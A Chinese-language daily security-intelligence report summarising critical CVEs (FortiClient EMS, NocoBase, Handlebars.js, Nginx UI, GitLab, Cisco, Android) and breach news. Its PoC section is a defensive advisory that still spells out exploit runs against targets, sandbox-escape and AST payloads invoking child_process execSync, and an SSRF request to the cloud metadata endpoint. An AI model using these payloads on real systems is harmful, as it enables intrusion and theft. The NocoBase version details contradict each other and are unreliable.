每日安全情报报告 · 2026-04-07

每日安全情报报告 · 2026-04-07报告时间2026年04月07日 08:00覆盖周期近48小时2026-04-05 ~ 2026-04-07风险等级说明 严重CVSS ≥ 9.0 高危7.0-8.9 中危4.0-6.9⭐ 在野利用一、最新高危漏洞⭐ CVE-2026-35616 · Fortinet FortiClient EMS 预认证 API 绕过 → RCE字段详情CVE 编号CVE-2026-35616CVSS 评分9.1严重漏洞类型不当访问控制 / 预认证 API 绕过 → 特权提升 → RCE受影响组件Fortinet FortiClient EMS 7.4.5 ~ 7.4.6状态✅ 紧急热补丁已发布 ⭐ 已在野利用 CISA KEV2026-04-06 收录漏洞描述FortiClient Enterprise Management ServerEMS中存在不当访问控制漏洞未经身份验证的攻击者可通过构造特制请求绕过 API 认证机制在无 Cookie、令牌或凭证的情况下对 EMS 服务器以 SYSTEM 权限及所有受管 FortiClient 终端节点批量执行任意命令。Fortinet 确认该漏洞已被在野利用CISA 于 2026-04-06 将其加入 KEV 目录要求联邦机构限期修复。公开 PoC 已出现于 GitHub。受影响范围企业级端点管理平台受管终端可被批量植入恶意载荷影响面极广。修复建议立即升级至 Fortinet 发布的紧急热补丁版本暂时无法升级的应限制 EMS 服务器的网络访问。 参考资料- NVD 详情- Fortinet 安全公告- Tenable 分析报告- The Hacker News 报道- BleepingComputer 报道 CVE-2026-34156 · NocoBase 工作流脚本沙箱逃逸 → Root RCE字段详情CVE 编号CVE-2026-34156CVSS 评分9.9严重漏洞类型Node.js VM 沙箱逃逸 → 远程代码执行Root 权限受影响组件NocoBase 2.0.28低代码平台状态补丁已发布 PoC 已公开漏洞描述NocoBase 工作流Workflow的 Script Node 在 Node.jsvm沙箱中执行用户提供的 JavaScript 时向沙箱传入的console对象暴露了宿主域host-realm的Function构造函数。经过身份验证的攻击者可利用此构造函数逃逸出vm沙箱以 NocoBase 服务进程通常为 root权限实现任意远程代码执行。该漏洞于 2026-03-31 首次披露CVSS 评分高达 9.9部分来源标注为 10.0属最高危级别。修复建议立即升级至 NocoBase 2.0.28 或更高版本升级前禁用工作流脚本节点功能。 参考资料- NVD 详情- OpenCVE 漏洞详情- 漏洞深度分析vuink.com- GitHub PoC0xBlackash CVE-2026-33937 · Handlebars.js AST 注入 → RCE字段详情CVE 编号CVE-2026-33937CVSS 评分9.8严重漏洞类型模板引擎 AST 注入 → 服务端远程代码执行受影响组件Handlebars.js所有受影响版本广泛用于 Node.js 生态状态补丁已发布 PoC 已公开漏洞描述Handlebars.js 的Handlebars.compile()函数在处理预解析的抽象语法树AST对象时对NumberLiteral节点的value字段未进行充分清理或转义导致攻击者可注入恶意 AST 结构实现服务端任意代码执行RCE。该漏洞于 2026-03-28 披露。Handlebars.js 广泛用于 Express、HBS 等 Node.js Web 框架影响面极大。修复建议升级至最新版 Handlebars.js所有接受用户输入作为 AST 的应用须立即审查代码。 参考资料- NVD 详情- justappsec 分析文章- Wiz 漏洞数据库- GitHub PoCdinhvaren CVE-2026-33032 · Nginx UI MCP 端点未授权访问 → 完全接管字段详情CVE 编号CVE-2026-33032CVSS 评分9.8严重漏洞类型认证缺失 → 未授权访问管理接口 → Nginx 服务完全接管受影响组件Nginx UI ≤ 2.3.5状态PoC 已公开漏洞描述Nginx UI 的 Model Context ProtocolMCP集成中的/mcp_message端点存在认证缺失漏洞未经身份验证的远程攻击者可直接调用管理工具接口完全接管 Nginx 服务配置及运行。这是继 CVE-2026-33026备份恢复加密缺陷之后Nginx UI 近期披露的第二个高危漏洞该项目安全性存在系统性问题。修复建议立即更新 Nginx UI 至最新版本若暂时无法升级应通过防火墙屏蔽/mcp_message端点的外部访问。 参考资料- NVD 详情- GitHub PoC 扫描工具Twinson333 CVE-2026-1868 · GitLab AI Gateway 模板注入 → RCE / DoS字段详情CVE 编号CVE-2026-1868CVSS 评分9.9严重漏洞类型模板注入Duo Workflow Service → DoS 或 RCE受影响组件GitLab AI Gateway 18.1.6、18.2.6、18.3.1~18.6.1、18.7.0、18.8.0状态补丁已发布 影响自托管 AI Gateway 用户漏洞描述GitLab Duo Self-Hosted AI Gateway 的DuoWorkflowService组件在处理用户提供的 Agent Platform Flow 定义时存在模板注入漏洞。攻击者可通过构造特制的 Duo Agent Platform Flow 定义使服务崩溃DoS或在最坏情况下实现对 Gateway 服务器的远程代码执行。该漏洞发生在AI 驱动开发工具链内部攻击路径更为隐蔽对企业 DevOps 流程构成重大威胁。修复建议立即升级受影响的 GitLab AI Gateway 版本未升级前可暂时禁用 Duo Workflow 功能。 参考资料- FreeBuf 报道- 阿里云 AVD 漏洞库- GitLab 安全公告 CVE-2026-20104 · Cisco IOS XE Bootloader 代码执行字段详情CVE 编号CVE-2026-20104CVSS 评分7.8高危漏洞类型Bootloader 代码执行绕过 Cisco 签名镜像要求受影响组件Cisco IOS XECatalyst 9200/ESS9300/IE9310 系列交换机状态补丁已发布2026-03-25 披露漏洞描述Cisco IOS XE 软件的 Bootloader 存在不足验证漏洞本地已认证攻击者可执行代码以绕过 Cisco 签名镜像要求在设备启动阶段加载未签名的恶意固件。成功利用可导致设备被持久化后门控制。该漏洞影响企业网络骨干交换机设备一旦被 APT 组织利用危害极为严重。修复建议按照 Cisco 安全公告要求升级对应固件版本加强设备物理访问控制。 参考资料- NVD 详情- SentinelOne 漏洞数据库- CVEDetails Android 2026年4月安全公告 · 38 个漏洞含严重 RCE字段详情发布时间2026-04-06修复漏洞数38 个含严重、高危状态安全补丁级别 2026-04-05 修复全部问题重点漏洞-CVE-2026-0123蓝牙栈远程代码执行漏洞严重级别可通过蓝牙无交互触发-CVE-2026-0145框架服务权限提升漏洞高危本地应用可获取 SYSTEM 权限-CVE-2026-0167媒体框架信息泄露漏洞高危可窃取敏感媒体数据此外本次公告还修复了高通Qualcomm和联发科MediaTek芯片组的多个内核级漏洞。修复建议督促设备厂商及时推送更新用户立即安装安全补丁2026-04-05 级别。 参考资料- Android 安全公告官方页面- 安全补丁汇总报道二、最新漏洞 PoCPoC #1CVE-2026-35616 · Fortinet FortiClient EMS 预认证 RCEPoC 来源GitHub - z3r0h3ro/CVE-2026-35616-poc危险等级 严重CVSS 9.1已在野利用PoC 状态已公开可直接利用利用步骤# 1. 克隆 PoC 仓库 git clone https://github.com/z3r0h3ro/CVE-2026-35616-poc.git cd CVE-2026-35616-poc # 2. 安装依赖 pip3 install -r requirements.txt # 依赖requests, pyyaml, argparse # 3. 基本利用在 EMS 服务器上执行命令无需认证 python3 exploit.py -t https://target-ems.example.com:8443 -c whoami # 4. 检查 EMS 版本通过认证绕过 python3 exploit.py -t https://target:8443 -c powershell -c \Get-ItemProperty HKLM:\\SOFTWARE\\Fortinet\\FortiClientEMS | Select Version\ # 5. 向所有受管终端批量部署命令 python3 exploit.py -t https://target:8443 --deploy-all -c payload_command⚠️警告此 PoC 影响 FortiClient EMS 7.4.5~7.4.6攻击者无需任何凭证即可对服务器及所有受管终端执行任意命令。仅供授权渗透测试使用严禁用于非法攻击。 相关资料- GitHub PoC 仓库- 漏洞技术分析Horizon3.ai- Qualys 威胁防护报告PoC #2CVE-2026-34156 · NocoBase 工作流沙箱逃逸 → Root RCEPoC 来源GitHub - 0xBlackash/CVE-2026-34156危险等级 严重CVSS 9.9/10.0PoC 状态已公开利用步骤# 1. 克隆 PoC 仓库 git clone https://github.com/0xBlackash/CVE-2026-34156.git cd CVE-2026-34156 # 2. 安装依赖 pip3 install -r requirements.txt # 3. 利用原理在工作流脚本节点中注入逃逸代码 # 攻击者通过 console 对象访问宿主域 Function 构造函数 # 示例恶意 payload在 NocoBase 工作流脚本节点中执行 # const escape this.constructor.constructor; # const rce escape(return process)(); # rce.mainModule.require(child_process).execSync(id /tmp/pwned); # 4. 运行自动化利用脚本 python3 exploit.py --target https://nocobase.target.com \ --username attackerexample.com \ --password password123 \ --command id⚠️警告需要一个有权访问工作流功能的已认证账户。受影响版本NocoBase 2.0.28请立即升级。 相关资料- GitHub PoC 仓库- NVD 详情- OpenCVE 分析PoC #3CVE-2026-33937 · Handlebars.js AST 注入 RCEPoC 来源GitHub - dinhvaren/cve-2026-33937危险等级 严重CVSS 9.8PoC 状态已公开影响广泛 Node.js 生态利用步骤# 1. 克隆 PoC 仓库 git clone https://github.com/dinhvaren/cve-2026-33937.git cd cve-2026-33937 # 2. 安装依赖 npm install # 或者 pip3 install -r requirements.txt # 如有 Python 版本 # 3. 漏洞原理演示 # 通过注入恶意 NumberLiteral AST 节点触发代码执行 # 示例恶意 AST payload # { # type: Program, # body: [{ # type: NumberLiteral, # value: 1; require(child_process).execSync(id) # }] # } # 4. 运行验证脚本 node poc.js --target http://vulnerable-app.example.com \ --endpoint /api/render-template⚠️警告该漏洞影响所有接受 AST 对象输入的 Handlebars.js 应用建议立即升级并审查所有使用Handlebars.compile()处理外部输入的代码路径。 相关资料- GitHub PoC 仓库- NVD 详情- justappsec 技术分析PoC #4CVE-2026-33340 · LoLLMs WEBUI 未授权 SSRFPoC 来源GitHub - regaan/CVE-2026-33340危险等级 严重CVSS 9.1PoC 状态已公开利用步骤# 1. 克隆 PoC 仓库 git clone https://github.com/regaan/CVE-2026-33340.git cd CVE-2026-33340 # 2. 安装依赖 pip3 install requests # 3. 利用 /api/proxy 端点进行 SSRF # 无需认证直接向目标 LoLLMs WEBUI 发送请求 curl -X POST http://target-lollms:9600/api/proxy \ -H Content-Type: application/json \ -d {url: http://169.254.169.254/latest/meta-data/} # 可用于获取 AWS 元数据、内网扫描等 # 4. 运行自动化脚本 python3 exploit.py --target http://target-lollms:9600 \ --internal-target http://192.168.1.1/admin⚠️警告LoLLMs 是流行的本地 AI 运行平台若暴露于公网则极易被利用进行内网渗透或云元数据窃取。 相关资料- GitHub PoC 仓库- PoC Week 2026-04-06 汇总三、网络安全最新文章 文章1微软披露 Storm-1175 利用零日漏洞部署 Medusa 勒索软件来源Microsoft Security Blog / BleepingComputer发布时间2026-04-06风险等级 严重威胁摘要微软威胁情报团队于 2026-04-06 披露中国背景的勒索软件附属组织 Storm-1175 正在开展高强度的 Medusa 勒索软件攻击活动其作案手法中结合使用零日漏洞和近期披露的 N-day 漏洞获取初始访问权限。攻击目标主要集中在医疗、金融、教育、专业服务和政府机构等关键行业攻击前会进行数月的侦察。Medusa 勒索软件采用高级加密算法和反分析技术并具有专门利用零日漏洞的自定义投递机制。Storm-1175 内部结构类似正规软件公司拥有专职的漏洞研究、利用开发、载荷创建和受害者谈判团队使其能够快速扩大攻击规模。 微软安全博客原文 | BleepingComputer 报道 | WindowsReport 分析 文章2ShinyHunters 声称窃取 Cisco 300万条 Salesforce 记录并发出公开勒索来源CyberNews / CyberSecurityNews / BleepingComputer发布时间2026-04-02 ~ 04-06风险等级 高危摘要知名黑客勒索组织 ShinyHunters 声称对 Cisco Systems 实施了三次独立入侵盗取超过 300 万条 Salesforce CRM 记录含个人数据、Salesforce AuraExperience Cloud数据以及 AWS 存储桶内容和 GitHub 仓库代码。该组织于 2026-03-31 更新公告设定公开泄露截止日期向 Cisco 施压。此次事件若属实将是 Cisco 遭遇的最大规模数据泄露之一同时也再次暴露了大型科技企业云服务SaaS IaaS的安全防护短板。Cisco 尚未发表官方回应。 CyberNews 报道 | CyberSecurityNews 分析 | InfoSecBulletin 详情 文章3PoC Week 2026-04-06本周最热门高危 CVE 利用代码汇总来源tonyharris.io / 多个安全通讯发布时间2026-04-06风险等级综合参考摘要本周2026-03-31 ~ 2026-04-06公开 PoC 的高危 CVE 集中在 Web 应用框架NocoBase、Handlebars、Spring AI、运维工具Trivy、Nginx UI和基础设施组件NetScaler、Grafana、Chrome等方向。漏洞类型涵盖代码注入、沙箱逃逸、供应链攻击和 SSRF多个 CVE 的 CVSS 评分达 9.8 ~ 9.9其中 CVE-2026-34156NocoBase 沙箱逃逸在部分来源中被评为 CVSS 10.0 满分。安全团队应重点关注 AI/LLM 类工具NocoBase、LoLLMs的沙箱安全隔离问题。 PoC Week 2026-04-06 阅读原文 文章4Fortinet FortiClient EMS CVE-2026-35616从0到 RCE 的完整攻击链分析来源Tenable / Horizon3.ai / DarkWebInformer发布时间2026-04-05 ~ 04-07风险等级 严重摘要多家安全公司相继发布了对 CVE-2026-35616 的深度技术分析。Tenable 指出该漏洞是自 CVE-2024-47575 以来 Fortinet 产品最严重的一次公开漏洞Fortinet 系列产品的在野利用历史悠久攻击者具备较强的利用能力。Horizon3.ai 客户可通过客户门户运行快速响应测试验证自身是否受影响。Fortinet 已紧急发布热补丁CISA 要求联邦机构于 2026-04-27 前完成修复。Qualys TruRisk 评分QVS将该漏洞评为极高风险。 Tenable 博客分析 | Horizon3.ai 研究报告 | Qualys 威胁防护 | DarkWebInformer 报道 文章5Zscaler ThreatLabz2026年3月供应链攻击激增Axios 和 LiteLLM 被植入 RAT来源Zscaler ThreatLabz发布时间2026-04-03风险等级 高危摘要Zscaler ThreatLabz 发布 2026 年 3 月供应链攻击专项报告重点披露了针对 Axiosnpm 库每周下载量超 1 亿次和 LiteLLMAI 框架的两起重大供应链投毒事件。攻击者植入远程访问木马RAT能够实现凭证窃取、横向移动和长期持久化。报告认为AI 开发生态的快速扩张带来了新的供应链风险开发者对 npm/PyPI 包的更新通常缺乏严格审查使攻击者得以长期潜伏。建议企业对所有第三方依赖实施软件供应链完整性验证如 SLSA 框架。 Zscaler ThreatLabz 报告阅读原文 文章62026年4月 Android 安全公告发布修复 38 个漏洞含蓝牙 RCE来源Google Android Security / TheCustomRom发布时间2026-04-06风险等级 高危摘要Google 于 2026-04-06 正式发布 2026 年 4 月 Android 安全公告共修复 38 个安全漏洞涵盖 Android 框架、内核及高通/联发科芯片组组件。其中最严重的 CVE-2026-0123蓝牙栈 RCE严重级别可允许攻击者通过蓝牙在无需用户交互的情况下实现远程代码执行。CVE-2026-0145框架权限提升和 CVE-2026-0167媒体框架信息泄露被评为高危。安全补丁级别需达到 2026-04-05 才能修复全部漏洞。 Android 官方安全公告 | 安全补丁汇总报道四、风险摘要与修复优先级优先级CVE / 事件风险描述建议行动P0 ⭐CVE-2026-35616FortiClient EMS 在野 RCECISA KEV立即安装紧急热补丁P0 CVE-2026-34156NocoBase CVSS 9.9/10.0 沙箱逃逸 RCE立即升级至 2.0.28P0 CVE-2026-33937Handlebars.js AST 注入 CVSS 9.8 RCE立即升级 代码审查P1 CVE-2026-1868GitLab AI Gateway 模板注入 CVSS 9.9本周内升级 GitLabP1 Android 4月公告蓝牙 RCE 38 个漏洞本周内推送安全补丁P2 CVE-2026-20104Cisco IOS XE Bootloader RCE本周内升级固件P2 ShinyHunters-Cisco300万 Salesforce 记录疑泄露排查 Salesforce/AWS 日志情报 Storm-1175 / Medusa中国背景勒索软件 零日利用加强 EDR 网络分段报告生成时间2026-04-07 08:00 UTC8数据来源NVD、CISA KEV、The Hacker News、BleepingComputer、GitHub、Tenable、Qualys、Zscaler ThreatLabz、微软安全博客部分内容由 AI 辅助生成建议结合官方公告进行二次核实